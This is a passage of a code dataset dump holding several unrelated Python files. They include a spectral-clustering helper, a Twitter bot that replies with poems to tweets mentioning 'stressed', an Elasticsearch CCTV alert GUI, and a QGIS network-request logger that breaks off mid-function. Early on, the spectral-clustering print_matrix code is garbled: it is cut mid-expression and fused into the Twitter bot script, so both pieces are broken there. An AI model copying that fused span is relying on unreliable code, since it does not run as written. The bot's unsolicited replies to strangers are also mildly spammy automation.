headers=headers)\r\n","sub_path":"study_docker_compose/project_api/project_api/utils/ApiResponse.py","file_name":"ApiResponse.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"508151752","text":"import subprocess\nimport time\nimport pandas as pd\nimport numpy as np\nfrom contextlib import redirect_stdout\n\nparse = lambda x: \"\".join(x.split()) # Remove Whitespaces.\n\ndef wam(datapoints,n):\n w = np.empty((n,n))\n for i in range(0,n):\n w[i][i] = 0\n for j in range(i+1, n):\n sum = np.sum((datapoints[i] -datapoints[j])**2)\n w[i][j] = np.exp(-np.sqrt(sum)/2)\n w[j][i] = w[i][j]\n return w\n\ndef ddg(W):\n d = np.sum(W,axis=1)\n d = np.diag(d)\n return d\n\ndef Lnorm(W,D,n):\n for i in range(n):\n D[i][i] = 1/np.sqrt(D[i][i])\n l = np.eye(n)-(D@W@D)\n return l\n\ndef print_matrix(matrix,n):\n for i in range(0,n):\n for j in range(0,n-1):\n num = matrix[i][j]\n if 0>num and -0.00005num and -0.00005 break_time:\r\n\t\treturn True\r\n\telse:\r\n\t\treturn False\r\n\t\t\r\nclass Poem():\r\n def __init__(self,title,text,number):\r\n self.title = title\r\n self.text = text\r\n self.number = number\r\n self.printpoem = ''\r\n self.topline = ''\r\n \r\n def Center_Alignment(self):\r\n x = len(str(self.number)) +2\r\n spaces = ' '*x\r\n self.title = spaces + self.title\r\n Title_Length = len(self.title)\r\n Broken_Text = self.text.split(\"\\\\n\")\r\n Max_Length = len(max(Broken_Text,key=len))\r\n if Title_Length > Max_Length:\r\n Max_Length = Title_Length\r\n Centered_List = []\r\n for line in Broken_Text:\r\n x = int(round((Max_Length-len(line))/2,0))\r\n line = ' '*x + line\r\n Centered_List.append(line)\r\n Centered_Text = ''\r\n for line in Centered_List:\r\n Centered_Text += line + \"\\n\"\r\n #print(Centered_Text)\r\n self.text = Centered_Text\r\n Amount_To_Add_To_Title = round((Max_Length-Title_Length)/2,0)\r\n Spaces = ''\r\n return self\r\n def Print_Poem(self):\r\n x = len(str(self.number))\r\n self.topline = str(self.number) + '- '+ self.title[x+2:]\r\n self.printpoem = self.topline +'\\n\\n\\n'+self.text\r\n return self\r\n \r\ndef Read_The_Lines(txt): #txt = \"BookofCalm.txt\" for example\r\n Poems = []\r\n file = open(txt,\"r\")\r\n page = 1\r\n for line in file:\r\n Title_Poem_Split = line.split(\"+\")\r\n Poems.append(Poem(Title_Poem_Split[0],Title_Poem_Split[1],page))\r\n page +=1\r\n file.close()\r\n return Poems #list of objects\r\ndef Check_Recents(txt,poemnumber):\r\n\tfile = open(txt,\"r\")\r\n\ttry:\r\n\t\tPoemNumbers = file.readline().split(\" \")\r\n\texcept:\r\n\t\tprint(\"can't read\")\r\n\tif str(poemnumber) in PoemNumbers:\r\n\t\tprint(\"%s is already in recents!!\" % str(poemnumber))\r\n\t\tfile.close()\r\n\t\treturn True\r\n\telif poemnumber not in PoemNumbers:\r\n\t\twhile len(PoemNumbers) >= 50:\r\n\t\t\tprint(\"Removing %s from recents\" % PoemNumbers[0])\r\n\t\t\tdel PoemNumbers[0]\r\n\t\tPoemNumbers.append(poemnumber)\r\n\t\tprint(\"Adding %s to recents\" % (poemnumber))\r\n\t\tfile = open(txt,\"w\")\r\n\t\tfor number in PoemNumbers:\r\n\t\t\tfile.write(str(number)+ \" \")\r\n\t\tfile.close()\r\n\t\treturn False\r\ndef Check_Time(txt):\r\n\tf = open(txt,\"r\")\r\n\ttime = datetime.strptime(f.readline(),'%Y-%m-%d %H:%M:%S.%f')\r\n\tif time == '':\r\n\t\tUpdate_Time(txt)\r\n\t\tCheck_Time(txt)\r\n\t\tf.close()\r\n\tf.close()\r\n\treturn time\r\ndef Update_Time(txt):\r\n\tf = open(txt,\"r\")\r\n\ttime = datetime.strptime(f.readline(),'%Y-%m-%d %H:%M:%S.%f')\r\n\tf = open(txt,\"w+\")\r\n\tf.write(str(datetime.now()))\r\n\tf.close()\r\n\t\r\ndef Check_For_Keywords(Poems,tweet):\r\n\ttweet = tweet.split(\" \")\r\n\tfor poem in Poems:\r\n\t\tintersection = set((poem.text).split(\" \")).intersection(set(tweet))\r\n\t\tif len(intersection) != 0:\r\n\t\t\tprint(\"found keyword(s) %s\" % intersection)\r\n\t\t\treturn poem\r\n\t\telse:\r\n\t\t\treturn random.choice(Poems)\r\n\t\r\ndef Pick_A_Poem(Poems):\r\n Poem_To_Print = random.choice(Poems)\r\n return Poem_To_Print.Center_Alignment().Print_Poem()\r\n\r\ndef Tweet_Poem(Poems,str,keyword_flag):\r\n\tCant_Tweet = True\r\n\tattempt = 0\r\n\twhile Cant_Tweet is True:\r\n\t\tif keyword_flag != \"\" and attempt == 0:\r\n\t\t\tPoem = Check_For_Keywords( Poems, tweet.text)\r\n\t\t\tattempt = 1\r\n\t\telse:\r\n\t\t\tPoem = random.choice(Poems)\r\n\t\tif len(Poem.Center_Alignment().Print_Poem().printpoem) +len(str) > 280:\r\n\t\t\tif len(Poem.Print_Poem().printpoem) +len(str) > 280:\r\n\t\t\t\tCant_Tweet = True\r\n\t\t\telif Check_Recents(\"Recents.txt\",Poem.number) is False:\r\n\t\t\t\treturn Poem.Print_Poem().printpoem\r\n\t\telif Check_Recents(\"Recents.txt\",Poem.number) is False:\r\n\t\t\treturn Poem.Center_Alignment().Print_Poem().printpoem\r\n\t\r\n\t\r\nauth = tweepy.OAuthHandler(\"\",\"\")\r\nauth.set_access_token(\"\",\"\")\r\napi = tweepy.API(auth)\r\ntry:\r\n\tapi.verify_credentials()\r\n\tprint(\"Authentication OK\")\r\n\t\r\nexcept:\r\n\tprint(\"Error during authentication\")\r\n#Start_Time = Time(\"StartTime.txt\")\r\nKeep_Tweeting = True\r\nwhile Keep_Tweeting is True:\r\n\tif Time_Check(60*60*4,Check_Time(\"ActivityTime.txt\")):\r\n\t\tPoems = Read_The_Lines(\"BookofCalm.txt\")\r\n\t\tTweet = Tweet_Poem(Poems,\"\",\"\")\r\n\t\tapi.update_status(Tweet)\r\n\t\tUpdate_Time(\"ActivityTime.txt\")\r\n\t\tprint(\"tweet sent to main\")\r\n\tif Time_Check(60*60*1,Check_Time(\"MentionTime.txt\")):\r\n\t\tfor tweet in api.search(q=\"stressed\",lang=\"en\", count=10):\r\n\t\t\tif tweet.retweeted is False:\r\n\t\t\t\tAlready_Favorite = False\r\n\t\t\t\ttry:\r\n\t\t\t\t\tapi.create_favorite(tweet.id)\r\n\t\t\t\texcept:\r\n\t\t\t\t\tAlready_Favorite = True #This will stop us from sending tweets to same tweet multiple times \r\n\t\t\t\t\tprint(\"can't favourite!\")#if our scanner doesn't produce new results\r\n\t\t\t\tif Already_Favorite is False:\r\n\t\t\t\t\tPoems = Read_The_Lines(\"BookofCalm.txt\")\r\n\t\t\t\t\tmention = \"@\"+str(tweet.author.screen_name)\r\n\t\t\t\t\tTweet = Tweet_Poem(Poems,mention,tweet)\r\n\t\t\t\t\tapi.update_status(status = Tweet,in_reply_to_status_id = tweet.id,auto_populate_reply_metadata=True)\r\n\t\t\t\t\tprint(\"tweet sent to %s!\" % tweet.user.name)\r\n\t\t\t\t\tUpdate_Time(\"MentionTime.txt\")\r\n\t\t\t\tsleep(6)\r\n\t\tprint(\"Finished\")\r\n\tsleep(600)\r\n\r\n","sub_path":"BookofCalmScript.py","file_name":"BookofCalmScript.py","file_ext":"py","file_size_in_byte":5656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"435478714","text":"\n\ndef voc_ap(rec, prec, use_07_metric=False):\n '\\n average precision calculations\\n [precision integrated to recall]\\n :param rec: recall\\n :param prec: precision\\n :param use_07_metric: 2007 metric is 11-recall-point based AP\\n :return: average precision\\n '\n if use_07_metric:\n ap = 0.0\n for t in np.arange(0.0, 1.1, 0.1):\n if (np.sum((rec >= t)) == 0):\n p = 0\n else:\n p = np.max(prec[(rec >= t)])\n ap += (p / 11.0)\n else:\n mrec = np.concatenate(([0.0], rec, [1.0]))\n mpre = np.concatenate(([0.0], prec, [0.0]))\n for i in range((mpre.size - 1), 0, (- 1)):\n mpre[(i - 1)] = np.maximum(mpre[(i - 1)], mpre[i])\n i = np.where((mrec[1:] != mrec[:(- 1)]))[0]\n ap = np.sum(((mrec[(i + 1)] - mrec[i]) * mpre[(i + 1)]))\n return ap\n","sub_path":"Data Set/bug-fixing-1/5e9e3d0949cb8051da61ef49339541b5e6f69c03--fix.py","file_name":"5e9e3d0949cb8051da61ef49339541b5e6f69c03--fix.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"126306805","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2019, stephen and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe import _\nfrom frappe.model.document import Document\n\n\nclass VehicleDetails(Document):\n def create_cost_center(self):\n \"\"\"\n\t\tCreate cost center with the name of the property under the selected parent cost center\n\t\t\"\"\"\n if self.vehicle_registration in (None, \"\"):\n frappe.msgprint(_(\"Please set vehicle registration first.\"))\n self.parent_cost_center = \"\"\n return\n from erpnext.setup.doctype.company.company import get_name_with_abbr\n\n real_name = get_name_with_abbr(self.vehicle_registration, self.company)\n # Check if the cost center exists before creating\n if frappe.db.exists(\"Cost Center\", real_name):\n cost_c = frappe.get_doc(\"Cost Center\", real_name)\n if cost_c.parent_cost_center == self.parent_cost_center:\n self.vehicle_cost_center = cost_c.name\n return\n frappe.msgprint(\n _(\n \"A Cost Center with this vehicle exists under another parent. You can make changes only in Cost Centers.\"\n )\n )\n self.parent_cost_center = cost_c.parent_cost_center\n return\n\n cost_c = frappe.get_doc(\n {\n \"doctype\": \"Cost Center\",\n \"cost_center_name\": self.vehicle_registration,\n \"parent_cost_center\": self.parent_cost_center,\n \"company\": self.company,\n \"is_group\": 0,\n }\n )\n frappe.db.begin()\n cost_c = cost_c.insert()\n frappe.db.commit()\n self.vehicle_cost_center = cost_c.name\n","sub_path":"vehicle_management/vehicle_management/doctype/vehicle_details/vehicle_details.py","file_name":"vehicle_details.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"24730934","text":"import sys\nimport datetime\nimport winsound\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import uic\nfrom PyQt5.QtCore import *\nfrom elasticsearch import Elasticsearch\n\n\nclass Alert(QDialog):\n # 경고창\n def __init__(self,parent):\n super().__init__()\n uic.loadUi(\"QTui/alert_popup.ui\",self)\n alert_text = \"위치 : {} , 탐지 시간 : {}\".format(parent.location,parent.timestamp_new)\n self.textBrowser.setPlainText(alert_text)\n winsound.Beep(2000,1000)\n\nclass ESping(QThread):\n # ES 상태 확인\n def __init__(self,parent):\n super().__init__()\n self.es = Elasticsearch(hosts=parent.ES_SERVER_IP, port=parent.ES_SERVER_PORT)\n\n def run(self):\n self.ES_STATUS = self.es.ping()\n\n\nclass OptionMenu(QDialog):\n # 메뉴-옵션창\n def __init__(self,parent):\n super().__init__()\n uic.loadUi(\"QTui/alert_option.ui\", self)\n self.setFixedSize(310, 153)\n self.ES_IP = parent.ES_SERVER_IP\n self.ES_PORT = parent.ES_SERVER_PORT\n self.input_ip.setText(parent.ES_SERVER_IP)\n self.input_port.setText(parent.ES_SERVER_PORT)\n self.okbtn.clicked.connect(self.confirm)\n\n def confirm(self):\n self.ES_IP = self.input_ip.text()\n self.ES_PORT = self.input_port.text()\n self.es_id = self.input_id.text()\n self.es_pw = self.input_pw.text()\n self.close()\n\nclass HelpMenu(QDialog):\n # 메뉴-도움말\n pass\n\nclass AboutMenu(QDialog):\n # 메뉴-정보창\n pass\n\nclass LogTable(QDialog):\n # 로그 테이블\n def __init__(self,parent):\n super().__init__(parent)\n uic.loadUi(\"QTui/log_table.ui\",self)\n self.refresh.clicked.connect(self.search_es)\n self.combo_box_options = [\"Unknown\", \"False Positive\", \"Person\"]\n self.index=parent.index\n self.es = parent.es\n self.search_es()\n self.show()\n\n def search_es(self):\n body = {\"query\": {\"match_all\": {}}, \"size\": 10, \"sort\": {\"@timestamp\": \"desc\"}}\n res= self.es.search(index=self.index,body=body)\n count = res['hits']['total']['value']\n if count >= 10:\n count = 10\n timestamp=[]\n location=[]\n objects=[]\n for i in range(count):\n timestamp.append(res['hits']['hits'][i]['_source']['detect_motion'])\n location.append(res['hits']['hits'][i]['_source']['location'])\n objects.append(res['hits']['hits'][i]['_source']['object'])\n\n for index in range(count):\n item1 = QTableWidgetItem(location[index])\n self.tableWidget.setItem(index, 0, item1)\n item2 = QTableWidgetItem(timestamp[index])\n self.tableWidget.setItem(index, 1, item2)\n item3 = QTableWidgetItem(objects[index])\n self.tableWidget.setItem(index, 2, item3)\n combo = QComboBox()\n button = QPushButton(\"Save\")\n for list in self.combo_box_options:\n combo.addItem(list)\n self.tableWidget.setCellWidget(index, 3, combo)\n self.tableWidget.setCellWidget(index, 4, button)\n self.tableWidget.resizeColumnsToContents()\n button.clicked.connect(self.update_es)\n now = datetime.datetime.now().strftime(\"%y-%m-%d %H:%M:%S\")\n self.update_time.setText(\"UPDATE \"+now)\n\n def update_es(self):\n buttonClicked = self.sender()\n index = self.tableWidget.indexAt(buttonClicked.pos())\n value = self.tableWidget.item(index.row(),1).text()\n body = {\"query\": {\"match\": {\"detect_motion\" : value}}}\n result = self.es.search(index=self.index, body=body)\n docID = result['hits']['hits'][0]['_id']\n widget = self.tableWidget.cellWidget(index.row(), 3)\n current_value = widget.currentText()\n self.es.update(index=self.index, id=docID, body={\"doc\":{\"object\" : current_value}})\n self.search_es()\n\n\n\n################### 메인 클래스 #####################\n\nclass Main(QMainWindow):\n def __init__(self):\n super().__init__()\n uic.loadUi(\"QTui/alert_main.ui\", self)\n self.setFixedSize(314, 218)\n self.timestamp_old = None\n self.timestamp_new = None\n self.es_server_id = None\n self.es_server_pw = None\n self.ES_SERVER_IP = \"127.0.0.1\"\n self.ES_SERVER_PORT = \"9200\"\n self.index =\"cctv\"\n self.status = False\n self.option_es = OptionMenu(self)\n self.alert_enable.triggered.connect(self.Alert_Enable)\n self.alert_disable.triggered.connect(self.Alert_Disable)\n self.menu_es_server.triggered.connect(self.exec_option)\n self.log_table.clicked.connect(self.view)\n self.show()\n\n def refresh(self):\n self.timer = QTimer(self)\n self.timer.start(5000)\n self.timer.timeout.connect(self.search_es)\n\n def exec_option(self):\n self.option_es.exec_()\n\n\n def view(self):\n if self.status:\n LogTable(self)\n else:\n QMessageBox.about(self, \"정보\", \"ES 서버상태를 확인해주세요.\")\n\n def Alert_Enable(self):\n self.ES_SERVER_IP = self.option_es.ES_IP\n self.ES_SERVER_PORT = self.option_es.ES_PORT\n self.status_alert_d.setText(\"enable\")\n self.alert_enable.setEnabled(False)\n self.alert_disable.setEnabled(True)\n\n self.es_ping = ESping(self)\n self.es_ping.start()\n self.refresh()\n\n def Alert_Disable(self):\n self.status_alert_d.setText(\"disable\")\n self.status_es_d.setText(\"disable\")\n self.alert_enable.setEnabled(True)\n self.alert_disable.setEnabled(False)\n self.status = False\n self.timer.stop()\n\n def search_es(self):\n self.ES_SERVER_IP = self.option_es.ES_IP\n self.ES_SERVER_PORT = self.option_es.ES_PORT\n self.es_server_id = self.option_es.es_id\n self.es_server_pw = self.option_es.es_pw\n\n try:\n self.ES_STATUS = self.es_ping.ES_STATUS\n except:\n self.status_es_d.setText(\"disable\")\n QMessageBox.about(self,\"ES Server\",\" 연결 실패[1] \")\n return self.Alert_Disable()\n\n self.es_ping = ESping(self)\n self.es_ping.start()\n self.es = Elasticsearch(hosts=self.ES_SERVER_IP,port=self.ES_SERVER_PORT,http_auth=(self.es_server_id, self.es_server_pw))\n body = {\"query\": {\"match_all\": {}},\"size\": 1,\"sort\": {\"@timestamp\": \"desc\"}}\n\n try:\n result = self.es.search(index=self.index, body=body)\n self.status_es_d.setText(\"enable\")\n self.location = result['hits']['hits'][0]['_source']['location']\n\n if self.timestamp_old is None:\n self.timestamp_old = result['hits']['hits'][0]['_source']['detect_motion']\n self.timestamp_new = result['hits']['hits'][0]['_source']['detect_motion']\n if self.timestamp_old != self.timestamp_new:\n self.timestamp_old = self.timestamp_new\n alert = Alert(self)\n alert.exec_()\n except:\n self.status_es_d.setText(\"disable\")\n QMessageBox.about(self, \"ES Server\", \" 연결 실패[2] \")\n return self.Alert_Disable()\n self.status = True\n\nif __name__ == \"__main__\":\n app=QApplication(sys.argv)\n main=Main()\n sys.exit(app.exec_())\n","sub_path":"CCTV/alert.py","file_name":"alert.py","file_ext":"py","file_size_in_byte":7375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"9132172","text":"# -----------------------------------------------------------\n# Copyright (C) 2015 Martin Dobias\n# -----------------------------------------------------------\n# Licensed under the terms of GNU GPL 2\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n# ---------------------------------------------------------------------\n\n# https://doc.qt.io/qt-5/qtwidgets-itemviews-editabletreemodel-example.html#design\n\n\nimport time\n\nfrom qgis.PyQt.QtCore import (\n QAbstractItemModel,\n QSortFilterProxyModel,\n QModelIndex,\n Qt,\n QUrlQuery\n)\nfrom qgis.PyQt.QtWidgets import (\n QApplication,\n QAction\n)\nfrom qgis.PyQt.QtGui import (\n QBrush,\n QFont,\n QColor,\n QDesktopServices\n)\nfrom qgis.PyQt.QtNetwork import (\n QNetworkAccessManager,\n QNetworkRequest,\n QNetworkReply\n)\nfrom qgis.core import (\n QgsNetworkAccessManager,\n QgsNetworkReplyContent,\n QgsNetworkRequestParameters\n)\n\n# get the logger for this QgisNetworkLogger plugin\nimport logging\nfrom . import LOGGER_NAME\nlog = logging.getLogger(LOGGER_NAME)\n\n\"\"\"\nCustom role to be able to keep the Status in the model data\n\"\"\"\nSTATUS_ROLE = Qt.UserRole + 1\n\n\"\"\"\nConstants for the different 'Statuses' a NetworkRequest can be in.\n\"\"\"\nPENDING = 'PENDING'\nCOMPLETE = 'COMPLETE'\nERROR = 'ERROR'\nTIMEOUT = 'TIMEOUT'\nCANCELED = 'CANCELED'\n\n\"\"\"\nConstant for the amount of nodes to keep available, to be able to limit\nthe number of nodes to retain and paint in the Views\n\"\"\"\nNODES2RETAIN = 45 # put in some settings dialog?\n\n\nclass ActivityModel(QAbstractItemModel):\n \"\"\"\n A (QAbstractItem)Model class for all the items from QgsNetworkRequests\n and Responses.\n\n Is responsible for:\n - connecting to current QgsNetworkAccessManager, which creates all\n kind of signals to which we connect to be able to show information\n about it in the Treeview\n\n Upon every network event (like a request to be created, finished etc),\n an ActivityTreeItem (an QAbstractItem) is created to get the data\n needed to be returned upon request of the View which uses this model.\n In our case a QTreeview in a DockWidget\n\n The model when being used looks more or less like this:\n\n RootItem\n |__RequestParentItem (showing id, type (GET etc) url)\n |__RequestItem (holding Request details)\n |__ RequestDetailsItem (key-value pairs with info)\n |__ RequestQueryItems ('Query' holding query info)\n |__ RequestDetailsItem (key-value pairs with info)\n |__ RequestHeadersItem ('Headers')\n |__ RequestDetailsItem (key-value pairs with info)\n |__ PostContentItem (showing Data in case of POST)\n |__ PostDetailsItem (key-value pairs with info)\n |__ReplyItem (holding Reply details)\n |__ ReplyHeadersItem ('Headers')\n |__ ReplyDetailsItem (key-value pairs with info)\n ...\n |__RequestParentItem (showing id, type (GET etc) url)\n ...\n\n \"\"\"\n def __init__(self, parent=None):\n super().__init__(parent)\n self.root_item = RootItem()\n\n self.is_paused = False\n\n # nam = NAM = NetworkAccessManager is a singleton who is responsible\n # for all network requests, use of proxy etc etc\n self.nam = QgsNetworkAccessManager.instance()\n\n # dictionary with all Requests (actually RequestParentItem's)\n # the requestId() of a QgsNetworkRequestParameters is the name/key in\n # this dictionary. This requestId is just an unique counter from the\n # NAM\n self.requests_items = {}\n\n # let us connect to all signals the NAM is throwing so we can react:\n self.nam.requestAboutToBeCreated[QgsNetworkRequestParameters]\\\n .connect(self.request_about_to_be_created)\n self.nam.finished[QgsNetworkReplyContent].connect(self.request_finished)\n self.nam.requestTimedOut[QgsNetworkRequestParameters]\\\n .connect(self.request_timed_out)\n self.nam.downloadProgress.connect(self.download_progress)\n self.nam.requestEncounteredSslErrors.connect(self.ssl_errors)\n\n # slot for nam.requestAboutToBeCreated[QgsNetworkRequestParameters]\n def request_about_to_be_created(self, request_params):\n child_count = len(self.root_item.children)\n self.beginInsertRows(QModelIndex(), child_count, child_count)\n self.requests_items[request_params.requestId()] = \\\n RequestParentItem(request_params, self.root_item)\n self.endInsertRows()\n\n if child_count > (NODES2RETAIN*1.2): # 20% more as buffer\n self.pop_nodes(child_count-NODES2RETAIN)\n\n # slot for nam.finished[QgsNetworkReplyContent]\n def request_finished(self, reply):\n if not reply.requestId() in self.requests_items:\n return\n request_item = self.requests_items[reply.requestId()]\n # find the row: the position of the RequestParentItem in the rootNode\n request_index = self.createIndex(request_item.position(), 0, request_item)\n self.beginInsertRows(request_index, len(request_item.children), len(request_item.children))\n request_item.set_reply(reply)\n self.endInsertRows()\n\n self.dataChanged.emit(request_index, request_index)\n\n # slot for nam.requestTimedOut[QgsNetworkRequestParameters]\n def request_timed_out(self, reply):\n if not reply.requestId() in self.requests_items:\n return\n request_item = self.requests_items[reply.requestId()]\n request_index = self.createIndex(request_item.position(), 0, request_item)\n request_item.set_timed_out()\n\n self.dataChanged.emit(request_index, request_index)\n\n # slot for nam.requestEncounteredSslErrors\n def ssl_errors(self, requestId, errors):\n if not requestId in self.requests_items:\n return\n request_item = self.requests_items[requestId]\n request_index = self.createIndex(request_item.position(), 0, request_item)\n self.beginInsertRows(request_index, len(request_item.children), len(request_item.children))\n request_item.set_ssl_errors(errors)\n self.endInsertRows()\n\n self.dataChanged.emit(request_index, request_index)\n\n # slot for nam.downloadProgress\n def download_progress(self, requestId, received, total):\n if not requestId in self.requests_items:\n return\n request_item = self.requests_items[requestId]\n request_index = self.createIndex(request_item.position(), 0, request_item)\n request_item.set_progress(received, total)\n\n self.dataChanged.emit(request_index, request_index, [Qt.ToolTipRole])\n\n def columnCount(self, parent):\n \"\"\"\n QAbstractItemModel interface: return the number of columns in the model\n for given parent. In this case: A QTreeView with just one column\n :param parent:\n :return: int column count\n \"\"\"\n return 1\n\n def rowCount(self, parent):\n \"\"\"\n Return the number of rows/children of this parent node\n\n :param parent:\n :return: int row count\n \"\"\"\n if parent.column() > 0:\n return 0\n parent_item = self.root_item if not parent.isValid() else parent.internalPointer()\n return len(parent_item.children)\n\n def data(self, index, role):\n \"\"\"\n Return the data of this node, used to style the items\n\n :param index:\n :param role:\n :return:\n \"\"\"\n if not index.isValid():\n return\n\n item = index.internalPointer()\n if role == Qt.DisplayRole:\n return item.text(index.column())\n elif role == Qt.ToolTipRole:\n return item.tooltip(index.column())\n elif role == STATUS_ROLE:\n return item.status\n elif role == Qt.ForegroundRole:\n if isinstance(item, RequestParentItem) and item.ssl_errors \\\n or isinstance(item, SslErrorsItem) \\\n or isinstance(index.parent().internalPointer(), SslErrorsItem):\n color = QColor(180, 65, 210)\n elif item.status in (PENDING, CANCELED):\n color = QColor(0, 0, 0, 100)\n elif item.status == ERROR:\n color = QColor(235, 10, 10)\n elif item.status == TIMEOUT:\n color = QColor(235, 10, 10)\n else:\n color = QColor(0, 0, 0)\n return QBrush(color)\n\n elif role == Qt.FontRole:\n f = QFont()\n if item.status == CANCELED:\n f.setStrikeOut(True)\n return f\n\n # not sure why this raises exceptions but commenting for now\n # is it used?\n # def flags(self, index):\n # if not index.isValid():\n # return 0\n # return Qt.ItemIsEnabled | Qt.ItemIsSelectable\n\n def index(self, row, column, parent_index):\n \"\"\"\n Get the QModelIndex of the given cell/item and it's parent index\n\n :param row:\n :param column:\n :param parent_index:\n :return: QModelIndex\n \"\"\"\n \n if not self.hasIndex(row, column, parent_index):\n return QModelIndex()\n\n parent_item = self.root_item if not parent_index.isValid() else parent_index.internalPointer()\n child_item = parent_item.children[row]\n return self.createIndex(row, column, child_item)\n\n def parent(self, index):\n \"\"\"\n Return the parent of given QModelIndex\n\n :param index:\n :return: QModelIndex\n \"\"\"\n if not index.isValid():\n return QModelIndex()\n\n parent_item = index.internalPointer().parent\n if parent_item.parent is None:\n return QModelIndex()\n\n parent_index_in_grandparent = parent_item.parent.children.index(parent_item)\n return self.createIndex(parent_index_in_grandparent, 0, parent_item)\n\n def headerData(self, section, orientation, role):\n if section == 0 and orientation == Qt.Horizontal and role == Qt.DisplayRole:\n return \"Requests\"\n\n def clear(self):\n \"\"\"\n Clear current model with Requests so we can start with a clean sheet.\n\n \"\"\"\n self.beginResetModel()\n self.root_item = RootItem()\n self.requests_items = {}\n self.endResetModel()\n\n def pause(self, state):\n \"\"\"\n Toggle the logging by temporary (dis)connecting the\n requestAboutToBeCreated signal from our\n request_about_to_be_created slot\n :param state:\n \"\"\"\n if state == self.is_paused:\n return\n\n self.is_paused = state\n if self.is_paused:\n QgsNetworkAccessManager.instance().requestAboutToBeCreated[QgsNetworkRequestParameters].disconnect(\n self.request_about_to_be_created)\n else:\n QgsNetworkAccessManager.instance().requestAboutToBeCreated[QgsNetworkRequestParameters].connect(\n self.request_about_to_be_created)\n\n def pop_nodes(self, count):\n \"\"\"\n Pop 'count' nodes from the list, to be able to retain a fixed size\n of items.\n\n :param count: int number of nodes to remove/pop\n \"\"\"\n log.debug('Removing {} Request nodes.'.format(count))\n self.beginRemoveRows(QModelIndex(), 0, count-1)\n if len(self.root_item.children) > 0:\n self.root_item.children = self.root_item.children[count:]\n self.endRemoveRows()\n\n\n\n\nclass ActivityProxyModel(QSortFilterProxyModel):\n \"\"\"\n The ActivityProxyModel is a QSortFilterProxyModel so we can make our\n QAbstractItemModel sortable / searchable\n\n \"\"\"\n def __init__(self, source_model, parent=None):\n super().__init__(parent)\n self.source_model = source_model\n self.setSourceModel(self.source_model)\n self.filter_string = ''\n self.show_successful = True\n self.show_timeouts = True\n\n def set_filter_string(self, string):\n self.filter_string = string\n self.invalidateFilter()\n\n def set_show_successful(self, show):\n self.show_successful = show\n self.invalidateFilter()\n\n def set_show_timeouts(self, show):\n self.show_timeouts = show\n self.invalidateFilter()\n\n def filterAcceptsRow(self, sourceRow, sourceParent):\n item = self.source_model.index(sourceRow, 0, sourceParent).internalPointer()\n if isinstance(item, RequestParentItem):\n if item.status in (COMPLETE, CANCELED) and not self.show_successful:\n return False\n elif item.status == TIMEOUT and not self.show_timeouts:\n return False\n\n return self.filter_string.lower() in item.url.url().lower()\n else:\n return True\n\n\n\nclass ActivityTreeItem(object):\n \"\"\"\n Parent class of all ActivityTreeItems sub classes.\n An ActivityTreeItems is kept in the ActivityModel and able to keep the\n information of it's NetworkActivity counter part\n \"\"\"\n\n def __init__(self, parent=None):\n self.parent = parent\n self.children = []\n if parent:\n parent.children.append(self)\n\n self.status = COMPLETE\n\n def text(self, column):\n return ''\n\n def tooltip(self, column):\n return self.text(column)\n\n def createWidget(self):\n return None\n\n def actions(self):\n return []\n\n def operation2string(self, operation):\n \"\"\" Create http-operation String from Operation\n\n :param operation: QNetworkAccessManager.Operation\n :return: string\n \"\"\"\n op = \"Custom\"\n if operation == QNetworkAccessManager.HeadOperation:\n op = \"HEAD\"\n elif operation == QNetworkAccessManager.GetOperation:\n op = \"GET\"\n elif operation == QNetworkAccessManager.PutOperation:\n op = \"PUT\"\n elif operation == QNetworkAccessManager.PostOperation:\n op = \"POST\"\n elif operation == QNetworkAccessManager.DeleteOperation:\n op = \"DELETE\"\n return op\n\n def position(self):\n \"\"\"\n Return the place of myself in the list of children of my parent.\n Needed to create an index of myself.\n :return: int\n \"\"\"\n # (this to be able to let the model know my 'row')\n if self.parent and self in self.parent.children:\n return self.parent.children.index(self)\n return 0\n\n\nclass RootItem(ActivityTreeItem):\n \"\"\"\n 'Invisible' root of the QTreeView\n \"\"\"\n def __init__(self, parent=None):\n super().__init__(parent)\n\n\nclass RequestParentItem(ActivityTreeItem):\n \"\"\"\n Every Request going via the NetworkAccessManager (NAM) fires a\n RequestAboutToCreated signal upon we create this RequestParentItem which\n acts as the parent of all information (both request AND later response) of\n this Request\n \"\"\"\n def __init__(self, request, parent=None):\n super().__init__(parent)\n self.url = request.request().url()\n self.id = request.requestId()\n self.operation = self.operation2string(request.operation())\n self.time = time.time()\n self.http_status = -1\n self.content_type = ''\n self.progress = None\n self.headers = []\n self.replies = 0\n self.data = request.content().data().decode('utf-8')\n for header in request.request().rawHeaderList():\n self.headers.append(\n (header.data().decode('utf-8'),\n request.request().rawHeader(header).data().decode('utf-8')))\n\n RequestItem(request, self)\n\n self.status = PENDING\n self.ssl_errors = False\n\n self.open_url_action = QAction('Open URL')\n self.open_url_action.triggered.connect(self.open_url)\n\n self.copy_as_curl_action = QAction('Copy as cURL')\n self.copy_as_curl_action.triggered.connect(self.copy_as_curl)\n\n def text(self, column):\n if column == 0:\n # id is the NAM id\n return '{} {} {}'.format(self.id, self.operation, self.url.url())\n return ''\n\n def open_url(self):\n \"\"\"Open (GET) the url of this RequestParentItem in the default browser\n of the user\"\"\"\n QDesktopServices.openUrl(self.url)\n\n def copy_as_curl(self):\n \"\"\"Get url + headers + data and create a full curl command\n Copy that to clipboard\n \"\"\"\n curl_headers = ''\n for header, value in self.headers:\n curl_headers += \"-H '{}: {}' \".format(header, value)\n curl_data = ''\n if self.operation in ('POST', 'PUT'):\n curl_data = \"--data '{}' \".format(self.data)\n curl_cmd = \"curl '{}' {} {}--compressed\".format(self.url.url(), curl_headers, curl_data)\n 